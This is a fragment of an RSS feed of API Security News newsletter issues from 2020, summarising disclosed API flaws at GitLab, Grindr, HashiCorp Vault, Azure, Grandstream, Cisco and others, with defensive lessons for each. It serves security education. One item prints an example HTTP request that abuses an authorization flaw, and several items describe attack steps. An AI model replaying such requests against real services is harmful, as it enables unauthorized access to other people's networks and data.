<p>The post <a href="https://apisecurity.io/issue-107-vulnerabilities-waze-aws-nhs-covid-19-app-forrester-app-sec-tech-tide/">Issue 107: Vulnerabilities in Waze, AWS, and NHS COVID-19 app, Forrester App Sec Tech Tide</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 106: API flaws at GitLab and Grindr, APICheck, API World and apidays conferences next week</title>
		<link>https://apisecurity.io/issue-106-api-flaws-gitlab-grindr-apicheck-api-world-apidays-next-week/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 21 Oct 2020 22:00:45 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7401</guid>

					<description><![CDATA[<p>This week, we have the recent API vulnerabilities at GitLab and Grindr, the APICheck tool gets donated to OWASP, there&#8217;s a summary on the basics of API authentication options, and complimentary registration links for the online conferences API World and apidays London next week. Vulnerability: GitLab Riccardo Padovani found an API vulnerability in GitLab related [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-106-api-flaws-gitlab-grindr-apicheck-api-world-apidays-next-week/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-106-api-flaws-gitlab-grindr-apicheck-api-world-apidays-next-week/">Issue 106: API flaws at GitLab and Grindr, APICheck, API World and apidays conferences next week</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have the recent API vulnerabilities at GitLab and Grindr, the APICheck tool gets donated to OWASP, there&#8217;s a summary on the basics of API authentication options, and complimentary registration links for the online conferences API World and apidays London next week.</p>
<h2>Vulnerability: GitLab</h2>
<p>Riccardo Padovani found an <a href="https://hackerone.com/reports/748375" target="_blank" rel="noopener noreferrer">API vulnerability in GitLab</a> related to Elasticsearch retrieving information in code and wikis of private groups by not authorized users.</p>
<p>This happened for groups that used to be public but were changed into a private group. Search API calls like <code>/api/v4/search?search=password&amp;scope=blobs</code>  could allow accessing data that was now supposed to be private. This issue clearly had its root in indexing and caching data, because if the work in the group continued, reindexing of the data got rid of the problem. However, if the data was never reindexed, the problem would have persisted.</p>
<p>This is an older vulnerability that got fixed quite some time ago, but it was not disclosed until recently.</p>
<p>Lesson learned: Make sure your performance optimization does not put security at risk.</p>
<h2>Vulnerability: Grindr</h2>
<p>From last week&#8217;s &#8220;dating blocks&#8221; to dating apps this week. An <a href="https://www.troyhunt.com/hacking-grindr-accounts-with-copy-and-paste/" target="_blank" rel="noopener noreferrer">excessive data exposure flaw in Grindr&#8217;s password reset API</a> allowed full account takeover.</p>
<p>The Grindr website allows users to reset their password. You enter an email address and a password reset token is sent to this email address. The problem was that under the hood the API behind the web page also returned the the secret reset code (and in plaintext):</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7402 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/10/Grindr_password_reset_API.png" alt="" width="1414" height="882" /></p>
<p>That means that attackers did not have to get access to the actual email inbox. They could simply pick the reset code from the API response and reset the victim&#8217;s password. The additional &#8220;precaution&#8221; of verifying the login with the new password in Grindr app did not really protect anything.</p>
<p>Once the disclosure of the vulnerability finally succeeded (an instructive story in itself), the vulnerability was luckily quickly fixed.</p>
<p>Lesson learned:</p>
<ul>
<li>There&#8217;s a reason why <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm">API3:2019 — Excessive data exposure</a> is in OWASP API Security Top 10.</li>
<li>Document (and also review) what your APIs return and how they are used. In this particular case:
<ul>
<li>Was the API returning the reset code for debugging purposes and someone forgot to remove the behavior?</li>
<li>Was the same API also used somewhere internally by another function that needed the code to store or validate it? That kind of double use of one API for two scenarios with different security levels is bad.</li>
</ul>
</li>
</ul>
<p>We covered earlier API vulnerabilities in Grindr and other dating apps, for example, in our <a href="https://apisecurity.io/issue-45-hacked-dating-apps-smartlocks-cloud-egregious-11/" target="_blank" rel="noopener noreferrer">issue 45</a>.</p>
<h2>Tools: APICheck</h2>
<p>BBVA Innovation Security Labs has <a href="https://owasp.org/www-project-apicheck/" target="_blank" rel="noopener noreferrer">donated their APICheck tool to OWASP</a>.</p>
<p>The APICheck tool is both a set of API testing utilities and an extensible pipeline to chain these utilities together. You can take the JSON output from one utility and pass it as the input to the next one.</p>
<p>The out of box utilities include:</p>
<ul>
<li>OpenAPI linters</li>
<li>Request replay</li>
<li>JWT validator</li>
<li>Sensitive data detector</li>
<li>Proxy</li>
<li><code>acurl</code> (cURL with <code>reqres</code> output)</li>
</ul>
<h2>Technology 101: API authentication</h2>
<p>If you are only getting started with API authentication, <a href="https://builtin.com/software-engineering-perspectives/api-security" target="_blank" rel="noopener noreferrer">Tammy Xu has posted an article</a> with an overview of the most common authentication mechanisms and the pros and cons of each. The mechanisms are:</p>
<ul>
<li>Basic authentication</li>
<li>OAuth</li>
<li>Mutual TLS</li>
</ul>
<h2>Free API conference passes: apidays London and API World</h2>
<p>Next week, two API-related conferences are taking place: apidays London on Oct 27—28 and API World on Oct 27—29.</p>
<p>Obviously, both are virtual so you can attend from the comfort of your own home. Both have talks related to API security, so check out the agendas.</p>
<p>And there are free passes available for both events:</p>
<ul>
<li><a href="https://apiworld.co/api-world-speaker/?s=Isabelle%20Mauny&amp;se=Common%20API%20Security%20Pitfalls:%20Learning%20from%20other%27s%20mistakes&amp;img1=https://sessionize.com/image%3Ff%3D7b8452fe489cd5e9d2d2793f8ca2df4d,200,200,1,0,4f-38a2-4eef-bfd7-4a5fa726f934.c90ae177-ce81-44e0-9e29-32aab7ad73fb.jpg&amp;utm_source=feathr&amp;utm_medium=network&amp;utm_campaign=Isabelle%20Mauny" target="_blank" rel="noopener noreferrer">API World free OPEN Pass link </a> (courtesy of Isabelle Mauny)</li>
<li><a href="https://www.eventbrite.com/e/apidays-live-london-the-road-to-embedded-finance-banking-and-insurance-tickets-104512985152?aff=IsabelleMauny" target="_blank" rel="noopener noreferrer">apidays London: free registration link</a></li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-106-api-flaws-gitlab-grindr-apicheck-api-world-apidays-next-week/">Issue 106: API flaws at GitLab and Grindr, APICheck, API World and apidays conferences next week</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 105: API vulnerabilities in HashiCorp, Azure App Services, and Qiui adult devices</title>
		<link>https://apisecurity.io/issue-105-api-vulnerabilities-hashicorp-azure-app-services-qiui-adult-devices/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 14 Oct 2020 22:00:04 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7383</guid>

					<description><![CDATA[<p>This week, we take a look at API vulnerabilities in HashiCorp Vault, Azure App Services, and &#8220;smart&#8221; adult toys. There is also an introductory video on finding information disclosure in JSON and XML API responses, and another cheat sheet and a webinar on OWASP API Security Top 10. Vulnerability: HashiCorp Vault Felix Wilhelm from Google&#8217;s [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-105-api-vulnerabilities-hashicorp-azure-app-services-qiui-adult-devices/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-105-api-vulnerabilities-hashicorp-azure-app-services-qiui-adult-devices/">Issue 105: API vulnerabilities in HashiCorp, Azure App Services, and Qiui adult devices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at API vulnerabilities in HashiCorp Vault, Azure App Services, and &#8220;smart&#8221; adult toys. There is also an introductory video on finding information disclosure in JSON and XML API responses, and another cheat sheet and a webinar on OWASP API Security Top 10.</p>
<h2>Vulnerability: HashiCorp Vault</h2>
<p>Felix Wilhelm from Google&#8217;s Project Zero has written a very detailed write-up on <a href="https://googleprojectzero.blogspot.com/2020/10/enter-the-vault-auth-issues-hashicorp-vault.html" target="_blank" rel="noopener noreferrer">an authentication bypass he found in the Amazon Web Services (AWS) and Google Cloud Platform (GCP) integration of HashiCorp Vault</a>. As a central storage of credentials, Vault makes an attractive target for attackers, and therefore a vulnerability in it is also very bad news. Looking for the silver linings, this attack was definitely quite advanced, and thus not easily exploitable.</p>
<p>In both cases, the attack effectively boiled down to forging JSON Web Tokens (JWT) that satisfied the parameters expected by Vault:</p>
<ul>
<li>For AWS, attackers could set up a minimal OpenId Connect identity provider, use that to sign a specifically crafted JWT, and send the request to the authentication service in AWS. The way Go XML decoder would parse the  response from AWS would mislead Vault to consider authentication successful.</li>
<li>With GCP, attackers would have to successfully impersonates a GCE instance with right configuration.</li>
</ul>
<p>In both cases, the end result would be the same: attackers get a valid session token, enabling them get access to secrets stored in the Vault server</p>
<p dir="ltr" role="presentation">As is evident from Wilhelm&#8217;s write-up, this exploit was not clear-cute, self-evident, or easy to find, so it may be unlikely that they have been exploited. According to Wilhelm:</p>
<blockquote><p><em>&#8220;In the end, Hashicorp fixed the vulnerability by enforcing an allowlist of HTTP headers, restricting requests to the GetCallerIdentity action and stronger validation of the STS response.&#8221;</em></p></blockquote>
<p>Positive security, allowlists, and locked-down implementations in your APIs are still the best way to minimize your attack surface. Security and especially security integrations can be riddled with pitfalls, so making sure your APIs are in good shape adds an important layer to the security.</p>
<h2>Vulnerability: Azure App Services</h2>
<p><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Paul Litvak found <a href="https://www.intezer.com/blog/cloud-security/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/" target="_blank" rel="noopener noreferrer">API vulnerabilities in Azure App Services</a>: the APIs of KuduLite, the app service administration component for Linux </span><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">lacked access checks.</span></p>
<p>KuduLite is hosted on the manager node of the service, while the application is hosted on a separate application node. The application node could send requests to the KuduLite API without any access validation. <span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Thus, anyone taking control over an app service in Azure (for example, with a Server Side Request Forgery (SSRF) attack) could get file system access via a GET call to the KuduLite VFS API:</span></p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7395 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/10/KuduLite-GET.png" alt="" width="955" height="403" /></p>
<p><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"> or even remote code execution capabilities by doing a POST call to the KuduLite Command API:</span></p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7396 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/10/KuduLite-POST.png" alt="" width="943" height="469" /></p>
<p>This is another example on how important it is to apply correct authentication and authorization checks even to API calls within the system. Microsoft has since fixed the vulnerability.</p>
<h2>Vulnerability: Qiui CellMate</h2>
<p>This API vulnerability generated quite a lot of click-bait headlines and broke even to the mainstream media: Pen Test Partners found <a href="https://www.pentestpartners.com/security-blog/smart-male-chastity-lock-cock-up/" target="_blank" rel="noopener noreferrer">the APIs behind the Qiui CellMate &#8220;male chastity&#8221; devices that allow remote control to partners to be highly vulnerable</a>.</p>
<p>The API allowed attackers to locate user records by supplying a 6-digit invitation code — something they could easily enumerate. This gave full access to the user records and all its details, allowed to retrieve all user information, including geographic location, and allowed taking over the devices and locking them in a way that prevented the users from unlocking them. Perfect material for further phishing or blackmail campaigns, and a full-blown nightmare for users.</p>
<p>Details are still scant because, although the vendor released version 2 of the API with some security fixes, they have still left the version 1 in use, continuing to expose the vulnerabilities. There is no indication that the vendor plans to fully fix the issue.</p>
<p>On a consumer-level this is yet another example that physical security needs to be considered any time smart devices are bought, especially from vendors lacking good security reputation.</p>
<p>On the vendor side, the key lessons learned would be:</p>
<ul>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication.htm" target="_blank" rel="noopener noreferrer">OWASP API2 Broken Authentication</a> can apply to a variety of APIs. Not just your main /login path but also various password reset and invitation flows.</li>
<li>Any codes need to have short expiration periods and measures need to be taken to prevent enumeration and brute-force attacks on them (longer, more complex codes, <a href="https://apisecurity.io/encyclopedia/content/owasp/api4-lack-of-resources-and-rate-limiting.htm" target="_blank" rel="noopener noreferrer">rate limiting</a>, and so on)</li>
<li>Be careful of leaving insecure earlier versions of APIs online. This exposes you to the <a href="https://apisecurity.io/encyclopedia/content/owasp/api9-improper-assets-management.htm" target="_blank" rel="noopener noreferrer">OWASP API9 Improper Assets Management vulnerability</a>.</li>
<li>And be responsive to security researchers!</li>
</ul>
<h2>Video: Reading JSON and XML for Information Disclosure</h2>
<p>There&#8217;s a new educational API security video from Katie Paxton-Fear.</p>
<p>This time she is covering the basics of finding information disclosure flaws in JSON and XML responses. Worth checking out if you are starting with APIs and API security:</p>
<p><iframe loading="lazy" title="Finding Your First Bug: Reading JSON and XML for Information Disclosure" width="640" height="360" src="https://www.youtube.com/embed/992cxaPdaho?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>Webinar and cheatsheet: OWASP API Security Top 10 and API life cycle</h2>
<p>OWASP API Security Top 10 vulnerabilities can be addressed on different stages of API life cycle with different tools: static analysis during development, dynamic testing as part of the QA and release, and runtime protection during the operation.</p>
<p><a href="https://42crunch.com/owasp-api-security-top-10/" target="_blank" rel="noopener noreferrer">42Crunch has posted a matrix of how their solution protects APIs against the vulnerabilities at each stage</a>.</p>
<p>Next Wednesday, October 21, Isabelle Mauny is also doing <a href="https://us02web.zoom.us/webinar/register/WN_xjIehT08T72kpsH5xandwA" target="_blank" rel="noopener noreferrer">a webinar on that same topic: practical approach of addressing each of the OWASP API Security Top 10 vulnerabilities</a>. She will explain the steps needed for each of them during design, development, as well as testing and runtime. Click on the link and register to reserve your spot.</p>
<p><a href="https://us02web.zoom.us/webinar/register/WN_xjIehT08T72kpsH5xandwA" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="size-full wp-image-7397 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/10/owasp_lifecycle_webinar.jpg" alt="" width="1200" height="675" /></a></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-105-api-vulnerabilities-hashicorp-azure-app-services-qiui-adult-devices/">Issue 105: API vulnerabilities in HashiCorp, Azure App Services, and Qiui adult devices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 104: API vulnerabilities at Twitter and Grandstream, mTLS in AWS API Gateway, Application Security Podcast</title>
		<link>https://apisecurity.io/issue-104-api-vulnerabilities-twitter-grandstream-mtls-aws-api-gateway-application-security-podcast/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 07 Oct 2020 22:00:20 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7350</guid>

					<description><![CDATA[<p>This week, we check out the recent API-related vulnerabilities at Twitter and Grandstream Networks, the newly added support for mutual TLS (mTLS) in AWS API Gateway, and the API security episode in the Application Security Podcast. Vulnerability: Twitter A misconfiguration in the Twitter developer portal caused browsers to cache API keys, account access tokens, and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-104-api-vulnerabilities-twitter-grandstream-mtls-aws-api-gateway-application-security-podcast/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-104-api-vulnerabilities-twitter-grandstream-mtls-aws-api-gateway-application-security-podcast/">Issue 104: API vulnerabilities at Twitter and Grandstream, mTLS in AWS API Gateway, Application Security Podcast</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out the recent API-related vulnerabilities at Twitter and Grandstream Networks, the newly added support for mutual TLS (mTLS) in AWS API Gateway, and the API security episode in the Application Security Podcast.</p>
<h2>Vulnerability: Twitter</h2>
<p><a href="https://www.zdnet.com/article/twitter-warns-of-possible-api-keys-leak/" target="_blank" rel="noopener noreferrer">A misconfiguration in the Twitter developer portal</a> caused browsers to cache API keys, account access tokens, and account secrets.</p>
<p><img loading="lazy" decoding="async" class=" wp-image-7351 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/10/Twitter-API-key-caching-note.jpg" alt="" width="252" height="533" /></p>
<p>It is highly unlikely that the vulnerability has been exploited. Not only would attackers have to had known about the vulnerability, they would also have needed physical access to the computers of their victims. That being said, this flaw could potentially had leaked these secrets on shared computers.</p>
<p>To avoid issues like this one, make sure you never cache any sensitive data on client-side.</p>
<h2>Vulnerability: Grandstream Networks</h2>
<p>Grandstream Networks is a global provider for IP video and voice services as well as WiFi and related services and equipment, and they operate in over 150 countries around the world.</p>
<p>The about 5 million Grandstream devices and services are managed in their GWN.Cloud management platform. Researchers from Pen Test Partners took a look at the platform and found <a href="https://www.pentestpartners.com/security-blog/cloudy-with-a-chance-of-hacking-all-the-wireless-things/" target="_blank" rel="noopener noreferrer">vulnerabilities in the APIs behind it</a>.</p>
<p>The web UI used an API to change device and network settings. When a user applied changes, the web UI invoked a <code>POST</code> operation where the <code>networkIds</code> field in the JSON payload contained the ID of the network to be configured:</p>
<pre class="line-numbers" data-start="17-19"><code class="language-http">POST /app/user/save HTTP/1.1
Host: www.gwn.cloud
Connection: close
Content-Length: 72
Accept: application/json, text/plain, */*
Origin: https://www.gwn.cloud/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: https://www.gwn.cloud/account/users
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SESSION=7672dd7d-58a7-47f2-8bbc-3534108e4987

{"email":"egw@mailinator.com",
"roleId":2,"
<strong>networkIds":[
16089
]</strong>,</code></pre>
<p>The problem was that this API never checked if the user was actually the owner of the network or in any way authorized to give access to it. Anyone could change settings of any network managed in through the Grandstream portal.</p>
<p>To make matters worse, the IDs were also sequential integers, making it possible to enumerate through them, and change settings and retrieve information, such as:</p>
<ul>
<li>View and change WiFi passwords</li>
<li>Switch off all devices</li>
<li>Get information on access points</li>
<li>Get information on WiFi clients (computer or phone name)</li>
<li>Get SSH passwords of all devices</li>
<li>Get system logs</li>
<li>Enable URL access log (all URLs clients have visited)</li>
</ul>
<p>This is a classic example of the <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">Broken Object-Level Authorization (BOLA / IDOR) vulnerability</a>, which is the number one in OWASP API Security Top 10). To avoid it:</p>
<ul>
<li>Ensure that you perform authorization checks on object access.</li>
<li>Avoid sequential identifiers.</li>
</ul>
<h2>Tools: mutual TLS support in AWS API Gateway</h2>
<p>Amazon has finally added <a href="https://aws.amazon.com/fr/blogs/compute/introducing-mutual-tls-authentication-for-amazon-api-gateway/" target="_blank" rel="noopener noreferrer">mutual certificate authentication option (mutual TLS) to AWS API Gateway</a> .</p>
<p>If your API is hosted in AWS and you use custom domain endpoints, you can upload your certificates and have API clients authenticate that way. You can still continue to use JWT and other mechanisms in addition to mTLS.</p>
<p><img loading="lazy" decoding="async" class=" wp-image-7355 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/10/tls8.png" alt="" width="360" height="350" /></p>
<h2>Podcast: API security at the AppSec Podcast</h2>
<p>If you are not a subscriber of the <a href="https://podcast.securityjourney.com/" target="_blank" rel="noopener noreferrer">Application Security Podcast</a>, you should definitely check it out. Every week, the hosts Chris Romeo and Robert Hurlbut have a guest and discuss a specific area of application security.</p>
<p>I took part in their latest episode and we had a lovely discussion of API Security, what makes it different from web application security, top threats, most effective counter-measures, and lots of real life stories.</p>
<p><iframe loading="lazy" title="Dmitry Sotnikov - REST API Security - There is no silver bullet" width="640" height="360" src="https://www.youtube.com/embed/TLH_E0Oe_Y0?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-104-api-vulnerabilities-twitter-grandstream-mtls-aws-api-gateway-application-security-podcast/">Issue 104: API vulnerabilities at Twitter and Grandstream, mTLS in AWS API Gateway, Application Security Podcast</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 103: API vulnerabilities at Cisco, Shopify, BrandBQ, a security guide to CORS</title>
		<link>https://apisecurity.io/issue-103-api-vulnerabilities-cisco-shopify-brandbq-security-guide-cors/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 30 Sep 2020 22:00:50 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7329</guid>

					<description><![CDATA[<p>This week, we check out three recent API vulnerabilities or breaches and what we know about them, and take a deep dive into cross-origin resource sharing (CORS). Vulnerability: Cisco Cisco has released critical security updates to IOS XE Software run by many of its devices. Two of the issues they have fixed are critical API [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-103-api-vulnerabilities-cisco-shopify-brandbq-security-guide-cors/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-103-api-vulnerabilities-cisco-shopify-brandbq-security-guide-cors/">Issue 103: API vulnerabilities at Cisco, Shopify, BrandBQ, a security guide to CORS</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out three recent API vulnerabilities or breaches and what we know about them, and take a deep dive into cross-origin resource sharing (CORS).</p>
<h2>Vulnerability: Cisco</h2>
<p><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ios-webui-priv-esc-K8zvEWM" target="_blank" rel="noopener noreferrer">Cisco has released critical security updates</a> to IOS XE Software run by many of its devices.</p>
<p>Two of the issues they have fixed are critical API vulnerabilities allowing privilege escalations of authenticated low permission-level users:</p>
<ul>
<li>Lack of input validation in one of the APIs allowed <a href="https://apisecurity.io/encyclopedia/content/owasp/api8-injection.htm" target="_blank" rel="noopener noreferrer">command injection</a>:<br />
<em>&#8220;An attacker could exploit this vulnerability by sending a modified HTTP request to the affected device. An exploit could allow the attacker as a read-only user to execute CLI commands or configuration changes as if they were an administrative<strong> </strong>user.&#8221;</em></li>
</ul>
<ul>
<li>Privileged authentication token leaking in API responses:<br />
<em>&#8220;The vulnerability is due to insufficient data protection of sensitive information. An attacker with read-only privileges could exploit this vulnerability by sending a crafted API call. A successful exploit could allow the attacker to obtain a privileged authentication token, which the attacker could use to elevate their privileges to the level of an administrative user on the affected device.&#8221;</em></li>
</ul>
<p>Both attacks could have been prevented with proper input and output data validation:</p>
<ul>
<li>Always strictly define your API inputs and outputs.</li>
<li>Be very specific: define data types,  min and max limits, and strict patterns for strings, schemas for JSON.</li>
<li>Enforce and test your data validation.</li>
<li>Review your response payloads to ensure that you only return the bare minimum of data required, and that the responses don&#8217;t contain anything damaging, should rogue users make API calls.</li>
</ul>
<p>We have covered previous API security issues in Cisco products in our newsletters <a href="https://apisecurity.io/issue-30-5g-going-to-rest-breaches-in-dell-cisco-weblogic-dockerhub-justdial-ilnkp2p/" target="_blank" rel="noopener noreferrer">30</a>, <a href="https://apisecurity.io/issue-42-http-security-headers/" target="_blank" rel="noopener noreferrer">42</a>, <a href="https://apisecurity.io/issue-43-rest-api-security-testing/" target="_blank" rel="noopener noreferrer">43</a>, <a href="https://apisecurity.io/issue-46-cisco-and-facebook-patch-apis-solr-api-parameter-injection/" target="_blank" rel="noopener noreferrer">46</a>, <a href="https://apisecurity.io/issue-47-cisco-mulesoft-vulnerabilities-api-world-passes/" target="_blank" rel="noopener noreferrer">47</a>, <a href="https://apisecurity.io/issue-51-gartner-releases-full-report-api-security/" target="_blank" rel="noopener noreferrer">51</a>, <a href="https://apisecurity.io/issue-55-vulnerabilities-eidas-cisco-routers-instagram-api-program-locked/" target="_blank" rel="noopener noreferrer">55</a>, <a href="https://apisecurity.io/issue-65-vulnerabilities-at-siemens-cisco-d-link-owasp-api-security-top-10-out/" target="_blank" rel="noopener noreferrer">65</a>, <a href="https://apisecurity.io/issue-69-vulnerabilities-in-azure-cloud-infrastructure-and-cisco-telepresence-api-fuzzing/" target="_blank" rel="noopener noreferrer">69</a>, <a href="https://apisecurity.io/issue-80-api-vulnerabilities-ibm-data-risk-manager-cisco-unified-computing-system/" target="_blank" rel="noopener noreferrer">80</a>, and <a href="https://apisecurity.io/issue-96-vulnerabilities-cisco-mgm-grand-casino-tutorial-chrome-devtools-pentesting-graphql/" target="_blank" rel="noopener noreferrer">96</a>.</p>
<h2>Vulnerability: Shopify</h2>
<p>Shopify has had a data breach affecting “less than 200 merchants”, according to their own statement. The number of affected customers of these merchants is unknown, but large.</p>
<p>The details in the official statement are scant but <a href="https://techcrunch.com/2020/09/23/shopify-data-merchant-breach/" target="_blank" rel="noopener noreferrer">TechCrunch got additional information</a> from one of the merchants affected:</p>
<blockquote><p><em>One merchant shared with TechCrunch a copy of Shopify’s email notification, which said the company first became aware of the breach on September 15, and that the two employees obtained data that was accessible using Shopify’s Orders API, which lets merchants process orders on behalf of their customers. The email also said that the last four digits of the customers’ payment card was taken in the incident.</em></p></blockquote>
<p>Lessons learned here:</p>
<ul>
<li>There is no such thing as an internal API! All APIs need to have security in place even if they exist only inside your network, for internal applications and users.</li>
<li>These &#8220;internal APIs&#8221; need to have all the regular security mechanisms to prevent abuse: authentication that lets in only authorized users and applications, authorization to prevent access to someone else&#8217;s data, rate limiting and monitoring to prevent bulk downloads, and so forth.</li>
</ul>
<h2>Vulnerability: BrandBQ</h2>
<p>BrandBQ, a large online fashion retailer in Eastern Europe, <a href="https://www.vpnmentor.com/blog/report-answear-leak/" target="_blank" rel="noopener noreferrer">has had a massive 1 terabyte data leak</a>. As often happens, this was caused by an unsecured Elasticsearch server that was accessible from the internet. However, this particular incident also had an API aspect to it.</p>
<p>The server contained transaction logs of API calls from both the website and the mobile app of the company. These logs included unredacted personal data on customers, such as names, physical addresses, and email addresses, as well as information on their transactions. The following screenshots illustrate the issue perfectly:</p>
<ul>
<li>Website newsletter call:</li>
</ul>
<p><img loading="lazy" decoding="async" class="wp-image-7332 size-full" src="https://apisecurity.io/wp-content/uploads/2020/09/Answear-2.png" alt="" width="2187" height="634" /></p>
<ul>
<li>iOS app API calls:</li>
</ul>
<p><img loading="lazy" decoding="async" class="wp-image-7331 size-full" src="https://apisecurity.io/wp-content/uploads/2020/09/Answear.png" alt="" width="1242" height="600" /></p>
<ul>
<li>Payment record from an online purchase:</li>
</ul>
<figure id="attachment_7333" aria-describedby="caption-attachment-7333" style="width: 2258px" class="wp-caption alignnone"><img loading="lazy" decoding="async" class="wp-image-7333 size-full" src="https://apisecurity.io/wp-content/uploads/2020/09/Answear-3.png" alt="" width="2258" height="204" /><figcaption id="caption-attachment-7333" class="wp-caption-text"><span style="font-size: 16px;">Not the kind of things you like see being public. Lessons learned:</span></figcaption></figure>
<ul>
<li>Always secure your data storage and avoid exposing it directly on the internet!</li>
<li>Treat logs as sensitive data.</li>
<li>Avoid over-storing data:
<ul>
<li>How long a history of actual transaction logs do you need, and for what reason?</li>
<li>Can you store aggregated data instead?</li>
</ul>
</li>
<li>Always redact all sensitive fields!</li>
</ul>
<h2>Security guide: Cross-Origin Resource Sharing (CORS)</h2>
<p>Cross-Origin Resource Sharing (CORS) is an important security mechanism that prevents web applications calling APIs that are not part of them.</p>
<p>As with any security mechanism, poor CORS configuration can give false sense of security while leaving gaps that can the attackers can take advantage of.</p>
<p>Ramandeep Kaur and Akash Shetty from IBM Security have published <a href="https://securityintelligence.com/posts/cors-how-to-use-and-secure-a-cors-policy-with-origin/" target="_blank" rel="noopener noreferrer">a fairly detailed guide to CORS security</a>:</p>
<ul>
<li>What is CORS and how it works?</li>
<li>What are the common CORS configuration gaps?</li>
<li>How these gaps can be discovered and exploited?</li>
</ul>
<p>Definitely worth a read for the dos and don&#8217;ts with CORS.</p>
<p>The post <a href="https://apisecurity.io/issue-103-api-vulnerabilities-cisco-shopify-brandbq-security-guide-cors/">Issue 103: API vulnerabilities at Cisco, Shopify, BrandBQ, a security guide to CORS</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 102: Vulnerabilities in Facebook and campaign apps, creating defensible APIs</title>
		<link>https://apisecurity.io/issue-102-vulnerabilities-facebook-campaign-apps-creating-defensible-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 23 Sep 2020 22:00:08 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7307</guid>

					<description><![CDATA[<p>This week, we look into the recent API vulnerabilities at Facebook and the campaign apps for US presidential election, a new book on the OpenAPI Specification (OAS), and a guest post by API security trainer Mohammed Aldoub on how to build APIs that are easy to defend against attackers. Vulnerability: Facebook Marcos Ferreira found a [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-102-vulnerabilities-facebook-campaign-apps-creating-defensible-apis/">Read More...</a></p>
